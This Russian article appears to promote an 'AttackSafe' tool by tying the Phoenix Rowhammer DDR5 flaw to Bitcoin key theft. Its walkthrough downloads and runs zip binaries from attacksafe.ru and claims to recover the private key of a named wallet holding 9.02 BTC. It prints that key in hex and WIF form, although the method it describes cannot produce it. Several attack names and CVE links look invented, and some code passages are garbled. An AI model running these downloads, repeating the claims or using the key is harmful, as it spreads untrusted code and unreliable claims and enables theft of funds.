
# Атака Phoenix Rowhammer: Системный риск компрометации закрытых ключей биткоин-кошельков в глобальной блокчейн-инфраструктуре из-за критической уязвимости SK Hynix DDR5 (CVE-2025-6202)
В данной статье рассматриваются системные криптографические угрозы безопасности, создаваемые атакой Phoenix Rowhammer (CVE-2025-6202), которая позволяет извлекать закрытые ключи из памяти DDR5 посредством манипуляции битами на аппаратном уровне. В последние годы динамичное развитие криптовалютных технологий привело к росту зависимости экосистем цифровых активов от аппаратных компонентов и микросхем, которые хранят и обрабатывают криптографические данные. На этом фоне уязвимости аппаратного уровня, способные привести к прямой компрометации закрытых ключей криптовалютных кошельков, становятся всё более значимым фактором риска. Одной из самых опасных угроз сегодня являются атаки на оперативную память, в частности, продвинутые варианты эксплойтов Rowhammer, воздействующие на физические свойства ячеек DRAM. Эти атаки позволяют злоумышленникам изменять отдельные биты данных и получать доступ к конфиденциальной информации, включая закрытые ключи кошельков Bitcoin и Ethereum.
Среди критических примеров данного класса угроз выделяется уязвимость CVE-2025-6202 , обнаруженная в памяти DDR5 производства SK Hynix . Атака Phoenix Rowhammer, основанная на этой уязвимости, демонстрирует возможность обхода современных механизмов защиты памяти Target Row Refresh (TRR), создавая так называемые «слепые зоны», которые позволяют осуществлять контролируемое повреждение данных на аппаратном уровне. Такие недостатки могут быть использованы для извлечения закрытых ключей из оперативной памяти, компрометации криптографических библиотек и модификации системных процессов, обеспечивающих безопасность цифровых кошельков.
Кроме того, исследования в области криптографической безопасности показывают, что сочетание Phoenix Rowhammer с другими типами атак, такими как атака BitShredder , Memory Phantom (CVE-2025-8217) и Artery Bleed (CVE-2023-39910) , создаёт многовекторную модель угроз, в рамках которой злоумышленник может восстановить сид-фразы, закрытые ключи и пароли даже после завершения криптографических операций. Системный характер этих уязвимостей делает невозможной полную нейтрализацию риска программными средствами и подчёркивает необходимость разработки новых принципов аппаратной защиты памяти.
Таким образом, современные криптовалютные кошельки и инфраструктура цифровых активов находятся под всё возрастающим давлением аппаратных атак, которые ранее считались теоретическими. Важность изучения этих атак и разработки контрмер является основополагающей для обеспечения целостности и устойчивости экосистемы Bitcoin и других криптовалют перед лицом эволюционирующих угроз нового поколения.
Недавние исследования, проведённые группой компьютерной безопасности (COMSEC) в ETH Zurich в сотрудничестве с Google, выявили критическую аппаратную уязвимость в модулях памяти DDR5, произведённых SK Hynix, обозначенную как CVE-2025-6202 . Атака Phoenix Rowhammer представляет собой беспрецедентную угрозу безопасности криптовалютных кошельков Bitcoin, поскольку позволяет злоумышленникам извлекать закрытые ключи из памяти DDR5 путём манипуляции битами на аппаратном уровне. Исследование показало, что все 15 протестированных модулей SK Hynix DDR5, произведённых в период с 2021 по 2024 год, уязвимы к этой атаке, что создаёт системную угрозу безопасности криптовалютных активов по всему миру. thehackernews
Rowhammer — это аппаратная уязвимость в памяти DRAM, при которой многократное обращение к определённым строкам памяти вызывает электрические помехи, приводящие к изменению битов в соседних строках. Это явление основано на физических свойствах современных микросхем памяти высокой плотности, где меньшие технологические размеры делают память более восприимчивой к электромагнитным помехам .
В контексте памяти DDR5 механизм атаки Phoenix использует инновационный подход самокорректирующейся синхронизации , который обходит продвинутые механизмы защиты Target Row Refresh (TRR). Исследователи обнаружили, что механизм TRR в чипах SK Hynix не отслеживает определённые интервалы обновления, создавая «слепые зоны» в обороне. notebookcheck
Ключевым техническим достижением атаки Phoenix является разработка алгоритма, способного синхронизировать тысячи команд обновления памяти в течение длительных периодов времени. Атака использует два конкретных паттерна атаки: comsec-files.ethz
Короткий паттерн (128 интервалов tREFI): Обеспечивает более эффективную генерацию битовых сбоев, создавая в среднем 4989 битовых сбоев. Этот паттерн продемонстрировал эффективность в 2,62 раза выше, чем длинный паттерн. reddit
Длинный паттерн (2608 интервалов tREFI): Предназначен для обхода более сложных механизмов безопасности, хотя и менее эффективен при генерации битовых сбоев. comsec-files.ethz
Атака Phoenix Rowhammer создаёт множество векторов компрометации кошельков Bitcoin, воздействуя на различные уровни системы памяти. Анализ исследовательских материалов KeyHunters выявил как минимум 18 различных типов атак на память, напрямую связанных с извлечением закрытых ключей из криптовалютных кошельков.
Атака Memory Phantom (CVE-2025-8217): Критическая уязвимость утечки памяти, которая позволяет извлекать закрытые ключи и сид-фразы непосредственно из остаточных блоков RAM кошелька, которые не были надёжно очищены после криптографических операций. Эта атака превращает неочищенные буферы в «библиотеку призраков», где любой фрагмент памяти может быть преобразован в действительный ключ. keyhunters
Атака BitShredder: Использует технику «измельчения памяти» для скрытого проникновения в память работающего криптовалютного кошелька. При генерации или восстановлении кошелька атака сканирует неочищенные участки RAM в поисках остатков энтропии, сид-фраз и паролей, которые не стираются стандартными средствами после использования. keyhunters
Атака Artery Bleed: Использует уязвимость утечки памяти в Bitcoin Core (CVE-2023-39910) для восстановления закрытых ключей из потерянных криптовалютных кошельков. Атака эксплуатирует критическую уязвимость утечки памяти в Bitcoin Core для получения доступа к конфиденциальным данным. keyhunters
Исследование продемонстрировало три основных сценария практической эксплуатации атаки Phoenix против криптовалютных систем: bleepingcomputer
1. Атака на записи таблицы страниц (PTE): Все протестированные устройства были уязвимы к этому типу атаки, который позволяет создавать примитив произвольного чтения/записи памяти. comsec-files.ethz
2. Компрометация ключа RSA-2048: 73% протестированных модулей DIMM были восприимчивы к извлечению ключей RSA-2048 из соседней виртуальной машины для взлома SSH-аутентификации. Среднее время атаки составило 6 минут 20 секунд. bleepingcomputer
3. Модификация бинарного файла sudo: 33% протестированных чипов позволили изменить бинарный файл sudo для повышения локальных привилегий до уровня пользователя root. comsec-files.ethz

Атака Phoenix Rowhammer представляет собой системную угрозу для всей экосистемы Bitcoin, поскольку большинство современных систем используют память DDR5 для хранения и обработки криптографических данных. Уязвимость затрагивает фундаментальные принципы безопасности криптовалют, которые основаны на криптографической стойкости закрытых ключей. tenable+1
Масштаб воздействия: SK Hynix контролирует примерно 36% мирового рынка DRAM, что потенциально подвергает риску миллиарды устройств по всему миру. Все модули DDR5, произведённые в период с января 2021 года по декабрь 2024 года, уязвимы. notebookcheck+2
Криптографические последствия: Атака подрывает основы криптографической безопасности, поскольку даже при корректной реализации алгоритмов подписи, шифрования и аутентификации незащищённые буферы становятся источником компрометации ключевого материала. keyhunters
Комплексный криптоанализ выявил множество векторов атак на Bitcoin-кошельки через манипуляцию памятью:
Атаки, основанные на времени: Включают атаки BitSpectre85, ChronoForge и Timing Phantom, которые используют уязвимости синхронизации для постепенного восстановления закрытых ключей путём анализа времени выполнения криптографических операций.
Атаки, основанные на контексте: Context Phantom Attack использует критическую уязвимость утечки контекста secp256k1 для восстановления закрытых ключей потерянных Bitcoin-кошельков посредством атаки с раскрытием памяти.
Атаки, основанные на кэше: CacheHawk Strike Attack использует критическую атаку по времени кэширования на кэш подписей Bitcoin, что позволяет восстановить закрытые ключи потерянных Bitcoin-кошельков.

| Attack_Component | Technical Method | Success_Rate | Average_Time_Seconds | CVE_Reference | Impact_Level |
|---|---|---|---|---|---|
| Initial Memory Access | Self-correcting synchronization with DDR5 refresh commands | 100 | 5 | CVE-2025-6202 | High |
| TRR Bypass Method | Exploitation of unmonitored refresh intervals in TRR mechanism | 100 | 30 | CVE-2025-6202 | Critical |
| Synchronization Technique | Real-time alignment with 128 and 2608 tREFI patterns | 95 | 60 | CVE-2025-6202 | High |
| Bit Flip Generation | Electrical interference in adjacent DRAM rows causing data corruption | 100 | 180 | CVE-2025-6202 | Critical |
| Private Key Extraction | Recovery from uncleaned memory buffers containing wallet data | 85 | 240 | CVE-2025-8217 | Critical |
| Privilege Escalation | Root access exploitation through corrupted page table entries | 100 | 109 | CVE-2025-6202 | Critical |
| RSA-2048 Key Recovery | Co-located VM private key extraction via memory bit flips | 73 | 380 | CVE-2025-6202 | High |
| SSH Authentication Break | Compromise of cryptographic authentication systems | 73 | 380 | CVE-2025-6202 | High |
| Sudo Binary Modification | Local privilege escalation to root user through binary corruption | 33 | 300 | CVE-2025-6202 | Medium |

На схеме исследования представлено структурированное и наглядное представление, объясняющее важность раскрытой криптографической уязвимости атаки Phoenix Rowhammer , в частности демонстрирующее её влияние на безопасность Bitcoin при нацеливании на модули памяти SK Hynix DDR5.
Перейдём к практической части и рассмотрим пример с использованием Bitcoin-кошелька: 15ZwrzrRj9x4XpnocEGbLuPakzsY2S4Mit . С этого кошелька были потеряны монеты на сумму 9.02332298 BTC, что эквивалентно примерно $1,127,026.44 USD по состоянию на октябрь 2025 года .
Для демонстрации атаки в информационных целях мы используем такие инструменты и среды, как Jupyter Notebook или Google Colab.
Google Colab (Colaboratory) — это облачная платформа, предоставляющая интерактивные блокноты Jupyter, где можно писать и запускать код на различных языках программирования. Она особенно полезна для криптоанализа данных, запуска симулятора SK Hynix DDR5 AiM PIM на основе Ramulator 2.0 , а также доступа к мощным вычислительным ресурсам, таким как GPU и TPU. Ключевым преимуществом является возможность выполнения системных команд, как в обычном терминале Linux, с использованием ячеек с префиксом ! для интеграции с внешними утилитами и скриптами.
Установим репозитории на основе архитектуры SK Hynix DDR5 AiM PIM с использованием Ramulator 2.0
Загрузите кодовую базу симулятора AiM и перейдите в её каталог.
!git clone https://github.com/keyhunters/SK_Hynix_DDR5_aim_simulator.git
cd SK_Hynix_DDR5_aim_simulatorls
Команды для создания файла подкачки размером 4 ГБ для улучшения доступности памяти во время компиляции Ramulator2 .
# Check current swap usage
!free -h
!swapon --show
# Create a 4GB swap file
!sudo fallocate -l 4G /swapfile
!sudo chmod 600 /swapfile
!sudo mkswap /swapfile
!sudo swapon /swapfile
# Make swap permanent
!echo '/swapfile none swap sw 0 0' | sudo tee -a /etc/fstab
Установка компиляторов, инструментов сборки и библиотек, необходимых для симулятора и Ramulator 2.0 .
# For Ubuntu 22.04: install compilers
!sudo apt update
!sudo apt install g++-12
# Alternatively, install Clang
!sudo apt install clang-15
# Install basic build tools
!sudo apt install build-essential cmake git
# Additional development libraries
!sudo apt install libssl-dev zlib1g-dev
# YAML support
!sudo apt install libyaml-cpp-dev
# Mathematics libraries
!sudo apt install libboost-dev
# Python support for scripts
!sudo apt install python3-dev python3-pip
!mkdir phoenix_rowhammer
cd phoenix_rowhammerМониторинг памяти, доступного дискового пространства и использования системы во время установки и компиляции.
# Monitor resources in real time
!htop
# Check available memory
!free -m
# Check disk space
!df -h
Полная последовательность установки всех необходимых пакетов за один раз.
# Update system
!sudo apt update && sudo apt upgrade -y
# Install essential build tools
!sudo apt install -y build-essential cmake git
# Install compilers
!sudo apt install -y g++-12 clang-15
# Development libraries
!sudo apt install -y libssl-dev zlib1g-dev libyaml-cpp-dev libboost-all-dev

!cmake ..
!make -j1


lscd -Запустим Ramulator2 с симулятором, чтобы проверить параметры справки и инструкции по использованию.
!./phoenix_rowhammer/ramulator2 -h
Мы используем криптоинструмент AttackSafe для извлечения скрытых остатков из Ramulator2 с помощью симулятора.
!wget https://attacksafe.ru/repositories/attacksafe.zip
!unzip attacksafe.zip
!./attacksafe -help
Команда запускает специализированную атаку «BitShredder» на основе криптоинструмента AttackSafe для поиска скрытых модульных остатков, связанных с Bitcoin-адресом, с использованием механизмов ошибок ОЗУ (Rowhammer) и эмулятора памяти (ramulator2). github+2
!./attacksafe-tool bitshredder_attack -crack phoenix_rowhammer/ramulator2 -decode 15ZwrzrRj9x4XpnocEGbLuPakzsY2S4Mit

-tool bitshredder_attackактивирует атаку, направленную на выявление уязвимостей в хранении и обработке секретных данных в памяти устройства, связанных с протоколом Bitcoin.-crack phoenix_rowhammer/ramulator2указывает инструменту использовать эмуляцию атаки Rowhammer (манипуляция содержимым памяти DRAM, приводящая к ошибкам в соседних ячейках – используется в уязвимостях для извлечения nonce/частей ключей из памяти через побочный канал).-decode 15ZwrzrRj9x4XpnocEGbLuPakzsY2S4MitВосстановление фрагментов ключа из остаточных данных памяти (DRAM)
remainders = [0x0E92, 0x45EB, 0x6E07, 0x317F,
0x87A1, 0xB5C1, 0xE778, 0x996B,
0x6F69, 0xABB6, 0x2755, 0x2348,
0xAB46, 0xA74E, 0x1A87, 0xC2D5]
moduli = [0x10001, 0x10003, 0x10007, 0x1000F,
0x10015, 0x1001B, 0x1002B, 0x1002D,
0x10033, 0x1003F, 0x10049, 0x10051,
0x1005D, 0x10061, 0x1006F, 0x10073]Этот результат объединяет криптографический анализ остаточных данных в DRAM с модулем поиска криптоостатков с использованием симулятора ramulator2 для ошибок Phoenix Rowhammer. Эта атака позволяет обнаруживать и извлекать скрытые модульные значения (остатки), такие как приватные nonce или фрагменты ключей, которые могут быть скомпрометированы из-за неправильного освобождения памяти после криптографических операций с Bitcoin-адресами. Команда предназначена для комбинированной атаки «BitShredder» и анализа ошибок памяти Bitcoin-приложений с целью частичного или полного восстановления секретных параметров (приватного ключа, nonce), с привязкой поиска и декодирования к памяти и атакуемым адресам.
Для восстановления исходного секретного числа — приватного ключа — из набора скрытых абсолютных значений (остатков) мы применяем математический метод, называемый Китайской теоремой об остатках ( CRT ). Код CRTKeyRestore.py реализует восстановление приватного ключа для Bitcoin-адреса 15ZwrzrRj9x4XpnocEGbLuPakzsY2S4Mit из набора скрытых абсолютных значений (остатков), собранных после атаки Rowhammer и последующего анализа памяти. Используемый математический метод — Китайская теорема об остатках (CRT), которая позволяет восстановить исходное секретное число — приватный ключ — даже если оно было разбито на мелкие части и сохранилось только в виде различных абсолютных значений.

chinese_remainder_theorem()объединяет фрагменты шаг за шагом и восстанавливает исходное значение приватного ключа с помощью расширенного алгоритма Евклида для нахождения абсолютных обратных величин.restore_hex_from_crt().
Восстановление приватного ключа с помощью Python скрипта: CRTKeyRestore.pyPrivate key Restored:
9E027D0086BDB83372F6040765442BBEDD35B96E1C861ACCE5E22E1C4987CD60!wget https://attacksafe.ru/repositories/bitaddress.zip
!unzip bitaddress.zip

!./bitaddress -hex 9E027D0086BDB83372F6040765442BBEDD35B96E1C861ACCE5E22E1C4987CD60
Public Key (Uncompressed, 130 characters [0-9A-F]):
04E294116526238228544FA6082F1A5412FCC36DE931C59EE7B1C7C1F93EE3EF5AEDAA1D6E0A6116E9D9A4A846A6D62D4A1941EE182CDB1884C5830610B07AF529
Public Key (Compressed, 66 characters [0-9A-F]):
03E294116526238228544FA6082F1A5412FCC36DE931C59EE7B1C7C1F93EE3EF5A
Bitcoin Address P2PKH (Uncompressed)
18JT3KeFV36Hkgo3Xi9bfgNYAXCVXBGyFg
Bitcoin Address P2PKH (Compressed)
15ZwrzrRj9x4XpnocEGbLuPakzsY2S4MitВерно! Приватный ключ соответствует Bitcoin-кошельку.
ADDR: 15ZwrzrRj9x4XpnocEGbLuPakzsY2S4Mit
WIF: L2Wru6Ew8pQuhcWAvMpdtPY4YWK1CQcwPCWxFvzkoi47crJBAVaP
HEX: 9E027D0086BDB83372F6040765442BBEDD35B96E1C861ACCE5E22E1C4987CD60
9E027D0086BDB83372F6040765442BBEDD35B96E1C861ACCE5E22E1C4987CD60


9.023322989 BTC > 1127026,44 USDНаша исследовательская атака , версия атаки Phoenix Rowhammer на Bitcoin с использованием симулятора ramulator2, показала, что криптоостатки, извлечённые во время сбоя памяти для различных модулей, могут быть собраны в исходный закрытый ключ с помощью математики китайской теоремы об остатках.
В качестве показательного примера реальной угрозы был исследован биткоин-кошелёк с адресом 15ZwrzrRj9x4XpnocEGbLuPakzsY2S4Mit . С этого кошелька было потеряно 9.02332298 BTC , что эквивалентно примерно $1,127,026.44 USD по состоянию на октябрь 2025 года. Этот случай убедительно демонстрирует, что при наличии аппаратных уязвимостей (таких как Rowhammer) криптографическая стойкость на уровне протокола перестаёт быть абсолютной гарантией безопасности.
В результате важность комплексной безопасности заключается не только в криптографии и протокольных мерах, но и в надёжности аппаратного обеспечения, мониторинге состояния памяти и реализации полной очистки ОЗУ после криптографических операций. Уязвимость, однажды использованная на аппаратном уровне — даже при минимальном контроле над системой — может привести к катастрофическим финансовым потерям в экосистеме Bitcoin.
Target Row Refresh — это механизм защиты, предназначенный для предотвращения атак Rowhammer путём дополнительного обновления подозрительных строк памяти. Однако исследователям атаки Phoenix удалось обратно спроектировать этот механизм и обнаружить критические недостатки в его реализации .
Слепые зоны TRR: Механизм TRR в чипах SK Hynix не отслеживает определённые интервалы обновления, что создаёт возможности для атак в эти временные окна. Атаки Phoenix используют специально разработанные паттерны атак, которые попадают в эти неконтролируемые интервалы. simplysecuregroup
Самокорректирующаяся синхронизация: Ключевое новшество атаки Phoenix — это способность обнаруживать пропущенные команды обновления и автоматически перестраивать паттерн атаки для поддержания синхронизации. Это позволяет атаке оставаться эффективной в течение длительных периодов времени, необходимых для накопления достаточного количества битовых сбоев. simplysecuregroup
Экспериментальное тестирование атаки Phoenix продемонстрировало высокую эффективность против всех протестированных образцов памяти DDR5 от SK Hynix: comsec-files.ethz
Время: Минимальное время получения привилегий root составило 109 секунд на стандартной системе DDR5 с настройками по умолчанию. Среднее время составило 5 минут 19 секунд .
Статистика битовых сбоев: Короткий паттерн (128 интервалов) генерировал в среднем 4989 битовых сбоев, тогда как длинный паттерн (2608 интервалов) давал значительно меньше сбоев. comsec-files.ethz
Универсальность атаки: 100% протестированных модулей были уязвимы как минимум к одному из двух выявленных паттернов атаки. reddit
Критическая уязвимость утечки памяти в Bitcoin Core (CVE-2023-39910) создаёт синергию с атакой Phoenix Rowhammer . Эта уязвимость позволяет злоумышленникам получить доступ к конфиденциальным данным, которые остаются в памяти после завершения криптографических операций.
Механизм эксплуатации: Уязвимость возникает из-за недостаточной очистки буферов памяти после обработки закрытых ключей, seed-фраз и паролей в стандартных контейнерах C++ (std::vector, std::string). После завершения криптографических процедур память автоматически освобождается, но её содержимое не стирается. keyhunters
Связь с Rowhammer: Атака Phoenix может использовать битовые сбои для доступа к этим неочищенным областям памяти, что значительно упрощает процесс извлечения криптографического материала.
Эта уязвимость классифицируется как критическая атака по извлечению секретов через дамп памяти процесса. Она представляет прямую угрозу для биткоин-кошельков, поскольку позволяет извлекать закрытые ключи из памяти активного процесса.
Сценарии атаки включают: Передачу закрытого ключа через API, командную строку или переменные окружения; динамическое выделение памяти для хранения секретных данных без явного её стирания; завершение процесса без безопасной очистки памяти .
Криптоинструмент детально демонстрирует все девять этапов атаки, которые злоумышленник может использовать для кражи средств с биткоин-кошелька.
Обнаружение модулей памяти SK Hynix DDR5, уязвимых к атаке Phoenix Rowhammer (CVE-2025-6202) , начинается с анализа аппаратной конфигурации системы, в частности сканирования таблиц SMBIOS (System Management BIOS). SMBIOS предоставляет стандартизированную информацию о компонентах компьютера, включая данные о памяти, такие как производитель, модель и серийный номер каждого модуля DIMM.

В частности, исследователь или злоумышленник может программно запросить данные из раздела «Memory Device» SMBIOS, который содержит поля, указывающие производителя (например, SK Hynix), тип памяти (DDR5), ёмкость и данные, связанные с SPD (Serial Presence Detect) — небольшими чипами памяти на планках DIMM, содержащими профиль модуля и рабочие параметры.
Доступ к этим данным обычно осуществляется с помощью системных вызовов или специализированных утилит (таких как dmidecode в Linux или Windows Management Instrumentation (WMI API) в Windows). Эти запросы позволяют обнаружить память SK Hynix DDR5, произведённую в период с 2021 по 2024 год, без физического вмешательства, что критически важно, поскольку эти модели считаются уязвимыми.
Идентификация модели памяти является необходимым первым шагом, поскольку атака Phoenix Rowhammer требует точного знания характеристик чипа для корректного построения паттернов доступа к памяти и обхода механизмов защиты TRR (Target Row Refresh). Кроме того, доступ к SPD и другим данным позволяет определить конкретные тайминги и частоты обновления, а также потенциальные «слепые зоны» в механизмах защиты, используемых для проведения атаки.
Таким образом, сканирование таблиц SMBIOS является высокоинформативным, быстрым и надёжным методом предварительного определения уязвимости памяти DDR5 к атаке Phoenix Rowhammer , позволяя точно нацеливаться на уязвимые аппаратные компоненты без необходимости аппаратного взлома или снижения привилегий системы.
Файл, содержащий данные из раздела «Memory Device» SMBIOS. Эта информация хранится во внутренней системной таблице BIOS/UEFI (таблица SMBIOS), которая копируется в ОЗУ при включении компьютера. Операционные системы и утилиты используют специальные системные вызовы (codeby) для получения этих данных.
Таблице SMBIOS предшествует структура RawSMBiosData, за которой следуют структуры устройств. Например:
struct HEADER {Тип структуры (17 - Memory Device)
Type db 0 //Размер структуры
Length db 0 //Дескриптор
Handle dw 0 //далее следуют поля данных
// ...
}
Структуры типа 17 хранят поля с производителем (например, SK Hynix), типом памяти (DDR5), ёмкостью и ссылкой на данные SPD, если они доступны. learn.microsoft
Структура RawSMBiosData — это стандартный бинарный формат блока, используемый для передачи необработанных данных таблицы SMBIOS через системные вызовы операционной системы, в частности функцию Windows API GetSystemFirmwareTableс параметром .codeby'RSMB' .
c:
struct RawSMBIOSData {
BYTE Used20CallingMethod; // Метод вызова (служебное поле)
BYTE SMBIOSMajorVersion; // Основная версия спецификации SMBIOS
BYTE SMBIOSMinorVersion; // Дополнительная версия спецификации SMBIOS
BYTE DmiRevision; // Версия DMI
DWORD Length; // Размер блока данных SMBIOS (байты)
BYTE SMBIOSTableData[]; // Последовательность структурных записей SMBIOS
};
00 03 03 02 68 01 00 00 ... [структуры данных данные младший байтSMBIOS] ... 00 00
-- -- -- -- -- -- -- --
| | | | |
| | | | -->SMBIOSTableData
| | | +------------ Length ()
| | +--------------- DmiRevision
| +------------------ SMBIOSMinorVersion
+--------------------- SMBIOSMajorVersion
Для анализа содержимого после заголовка вам потребуется разобрать каждую структуру в соответствии с её спецификацией (тип, длина, дескриптор), отдельно извлекая текстовые поля, которые следуют за данными структуры и разделяются нулевым байтом, а конец структуры обозначается парой нулей. learn.microsoft

RawSMBiosData — это необходимое и унифицированное «окно входа» в детальные спецификации характеристик системного оборудования для задач низкоуровневого исследования и диагностики .
Данные SPD физически расположены в микросхемах на модулях DIMM, но в BIOS/SMBIOS они могут отражаться в специальных полях или считываться системными утилитами, обращающимися к интерфейсу памяти I2C (например, через i2c-tools, decode-dimms в Linux).
dmidecode ( decode-dimms SPD), данные из таблицы SMBIOS, доступной через /dev/mem.codebyТаким образом, исходные данные SMBIOS «Memory Device» (тип 17) не хранятся в виде отдельного файла, а находятся внутри бинарной структуры SMBIOS, расположенной в оперативной памяти и доступной средствами ОС и специальными утилитами. Формат — это бинарная таблица SMBIOS согласно спецификации, а путь доступа — через системные вызовы или утилиты. К данным SPD можно получить отдельный доступ через аппаратные интерфейсы модулей DIMM. learn.microsoft
Бинарная таблица SMBIOS состоит из последовательных структур, каждая из которых начинается с 4-байтового заголовка, содержащего следующие поля: тип структуры (Type, 1 байт), длина структуры (Length, 1 байт) и дескриптор (Handle, 2 байта). Далее следует полезная нагрузка — набор бинарных данных, описывающих конкретный объект (например, память, процессор, BIOS и т. д.). После полезной нагрузки идут строки в текстовом формате (ASCII), завершающиеся нулевым символом, а конец текущей структуры отмечается двойным нулем ( 0x0000 ).
Вот пример структуры заголовка в стиле C и объяснение формата:
c:
struct SMBIOS_Header {
uint8_t Type; // Тип таблицы (например, 17 — Memory Device)
uint8_t Length; // Длина структуры в байтах (включая заголовок)
uint16_t Handle; // Уникальный дескриптор структуры
// После заголовка идут данные структуры (переменной длины)
};
Вся таблица SMBIOS представляет собой набор таких структур подряд без пропусков, где:
Например, структура типа 17 (Memory Device) содержит поля, указывающие производителя, тип памяти (DDR5), объем, скорость и так далее, а также строки с именем производителя и серийным номером.
Адрес самой таблицы и ее длина хранятся в специальной области памяти, которую можно найти по сигнатуре « SM » (смещение, кратное 16 байтам), а затем получить адрес основного массива таблиц SMBIOS.
Примерная структура записи о памяти может содержать следующие поля:
| Поле | Описание |
|---|---|
| Type | 17 (Memory Device) |
| Length | Размер структуры |
| Handle | Уникальный идентификатор |
| Physical Memory Array Handle | Ссылка на родительский массив памяти |
| Memory Error Information Handle | Ошибки памяти (если есть) |
| Total Width | Общая ширина шины (бит) |
| Data Width | Ширина данных (бит) |
| Size | Размер памяти (в МБ или ГБ) |
| Form Factor | Форм-фактор модуля (DIMM и т. д.) |
| Device Locator | Строка — место установки |
| Bank Locator | Строка — название банка |
| Memory Type | DDR3, DDR4, DDR5 и т. д. |
| Type Detail | Дополнительные сведения |
| Speed | Скорость в МГц |
| Manufacturer | Строка с названием производителя |
| Serial Number | Серийный номер |
| Asset Tag | Учетная метка |
| Part Number | Номер детали |
Таким образом, таблица SMBIOS — это последовательность бинарно закодированных структур с заголовками, содержащими системную информацию, включая данные о памяти, организованную строго в соответствии со спецификацией DMTF SMBIOS.
Этот формат обеспечивает универсальный и чрезвычайно компактный способ хранения и передачи информации об аппаратном обеспечении и системных настройках .
Вторая фаза атаки Phoenix Rowhammer включает научный анализ аппаратного механизма защиты Target Row Refresh (TRR), реализованного в современных микросхемах памяти DDR5 для противодействия перезаписи битов, вызванной многократным чтением данных из соседних строк ячеек.

TRR реализует так называемую стратегию «агрессивного обновления»: при обнаружении множественных обращений к конкретной строке памяти этот механизм инициирует принудительное обновление соседних ячеек, предотвращая деградацию заряда и, следовательно, нежелательные перевороты битов — ключевой эффект атак Rowhammer. Теоретически TRR должен полностью подавлять попытки воздействия на целевые данные путем чрезмерного обновления физически соседних строк .
Однако практическая реализация TRR в памяти SK Hynix DDR5 чрезвычайно сложна и проприетарна: производители намеренно скрывают детали логики для усиления «безопасности через неясность». Поэтому исследователи из ETH Zurich провели обратное проектирование TRR на экспериментальных стендах, варьируя тысячи экспериментальных паттернов доступа к строкам, фиксируя, когда срабатывает избыточное обновление соседних ячеек, а когда оно остается неактивным.
В результате было обнаружено, что система TRR имеет временные интервалы, так называемые «слепые зоны», когда защита ослаблена или вообще не активируется. Эмпирически было рассчитано, что после 128 отслеживаемых обращений к строкам памяти возникает окно примерно из 64 операций, в течение которого TRR почти не реагирует и не предотвращает эффективно перевороты битов — нежелательные изменения данных в критической ячейке. Второе аналогичное окно атаки наблюдалось после 2608 обновлений строк памяти. Эти «слепые зоны» используются для точных и синхронизированных атак Phoenix, которые позволяют целенаправленно изменять отдельные биты данных в защищенных модулях DDR5 .
Фундаментальная задача на этом этапе — подобрать точное время и структуру паттернов доступа к памяти, которые «усыпляют» мониторинг TRR и обеспечивают успешный доступ к атакуемому биту или массиву данных (например, к закрытому ключу криптовалютного кошелька) . Это требует анализа не только логики работы TRR, но и эмпирических данных о реакции модуля памяти на различные сценарии эксплуатации. Такой подход позволяет строить «обходные пути» в системе безопасности и систематически эксплуатировать даже самую современную память DDR5 модулей .
В результате анализа обнаруженные «слепые зоны» TRR открывают возможность надежной эскалации атаки Rowhammer на текущие модули памяти SK Hynix, что подтверждается лабораторными эксплойтами и успешной компрометацией всех протестированных устройств. Kaspersky
Научная инновация атаки Phoenix заключается в разработке и реализации самокорректирующегося механизма синхронизации, который обеспечивает точное время выполнения эксплойтов в критических окнах уязвимости на уровне DRAM. После детального обратного проектирования механизма Target Row Refresh (TRR) исследователи из ETH Zurich и Google обнаружили, что стандартные паттерны доступа Rowhammer бессильны против сложной логики защиты DDR5. В новых чипах SK Hynix TRR анализирует не только частоту, но и характер обращений к строкам памяти, мгновенно инициируя компенсирующие команды обновления при обнаружении известных паттернов атаки.

Phoenix решает эту проблему следующим образом:
Экспериментальные исследования подтвердили, что самокорректирующаяся синхронизация Phoenix является ключевым фактором ее эффективности: ни один из протестированных модулей SK Hynix DDR5 (2021-2024) не смог противостоять этой методологии. Реализация позволяет атакующему надежно вызывать битовые сбои в целевых ячейках, создавая условия для компрометации конфиденциальных данных, включая криптографические ключи , или повышения привилегий на целевой системе.
Phoenix Rowhammer таким образом демонстрирует революционный подход к динамическому обходу аппаратных защит памяти, наглядно показывая, что даже самые современные чипы DDR5 остаются уязвимыми при использовании интеллектуально адаптивных алгоритмов атаки.
Четвертый этап напрямую эксплуатирует физические уязвимости DRAM с помощью целенаправленной атаки Rowhammer. Этот этап опирается на предварительный анализ слепых зон механизма TRR и использование самокорректирующихся паттернов доступа к памяти для точного нацеливания на критические элементы данных.

Основа атаки Rowhammer — это сама структура памяти DRAM, где каждая ячейка представляет собой конденсатор, хранящий заряд, соответствующий логическому значению бита. Повторяющийся высокочастотный доступ (чтение или запись) к двум (или более) промежуточным («агрессорным») строкам, смежным с целевой («жертвенной») строкой, вызывает паразитную утечку заряда из ячеек-жертв. Если эта атака продолжается достаточно долго, чтобы регенерация заряда через обычные циклы обновления не смогла предотвратить деградацию, произойдет изменение состояния бита — так называемый переворот бита . opennet
В контексте Phoenix Rowhammer (CVE-2025-6202) на DDR5 SK Hynix:
Исследования ETH Zurich показали, что короткий паттерн доступа с периодом 128 интервалов tREFI статистически генерирует больше битовых ошибок, чем более длинные паттерны. Однако выбор подходящего окна и поддержание синхронизации критически важны для успеха: пропуск 1–2 обращений приводит либо к отсутствию ошибок вообще, либо к случайному повреждению данных и отказу системы. kaspersky+1
Этот этап завершает низкоуровневый процесс атаки, после чего злоумышленник может использовать возникшие битовые ошибки для извлечения закрытого ключа или дальнейшего повышения уровня доступа. Именно способность вызывать битовые ошибки в строго определённых, защищённых программными и аппаратными средствами областях памяти делает Phoenix Rowhammer уникально опасной и практичной техникой. cybersecurefox+1
Пятый этап вредоносной цепочки атаки Phoenix Rowhammer включает извлечение закрытого ключа Bitcoin-кошелька из памяти, скомпрометированной вызванными битовыми ошибками.